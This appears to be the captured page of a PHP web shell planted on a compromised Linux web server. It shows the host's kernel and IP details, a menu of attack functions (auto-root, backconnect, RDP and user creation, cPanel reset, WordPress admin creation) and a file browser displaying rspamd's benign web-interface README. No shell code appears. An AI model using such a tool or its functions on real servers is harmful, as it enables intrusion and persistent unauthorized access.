Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.17.142.93
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
rspamd /
www /
rspamd /
[ HOME SHELL ]
Name
Size
Permission
Action
css
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
README.md
1.48
KB
-rw-r--r--
apple-touch-icon.png
435
B
-rw-r--r--
browserconfig.xml
250
B
-rw-r--r--
favicon-16x16.png
257
B
-rw-r--r--
favicon-32x32.png
300
B
-rw-r--r--
favicon.ico
10.48
KB
-rw-r--r--
index.html
24.3
KB
-rw-r--r--
mstile-150x150.png
711
B
-rw-r--r--
safari-pinned-tab.svg
316
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.md
# Rspamd web interface ## Overview This is a simple control interface for rspamd spam filtering system. It provides basic functions for setting metric actions, scores, viewing statistic and learning. <img src="https://rspamd.com/img/webui.png" class="img-responsive" alt="Webui screenshot"> ## Rspamd setup It is required to configure dynamic settings to store configured values. Basically this can be done by providing the following line in options settings: ~~~nginx options { dynamic_conf = "/var/lib/rspamd/rspamd_dynamic"; } ~~~ Please note that this path must have write access for rspamd user. Then controller worker should be configured: ~~~nginx worker { type = "controller"; bind_socket = "localhost:11334"; count = 1; # Password for normal commands password = "q1"; # Password for privilleged commands enable_password = "q2"; # Path to webiu static files static_dir = "${WWWDIR}"; } ~~~ Password option should be changed for sure for your specific configuration. Encrypted password using is encouraged (`rspamadm pw --encrypt`). ## Interface setup Interface itself is written in pure HTML5/js and, hence, it requires zero setup. Just enter a password for webui access and you are ready. ## Contact information Rspamd interface is distributed under the terms of [MIT license](http://opensource.org/licenses/MIT). For all questions related to this product please see the [support page](https://rspamd.com/support.html)
Close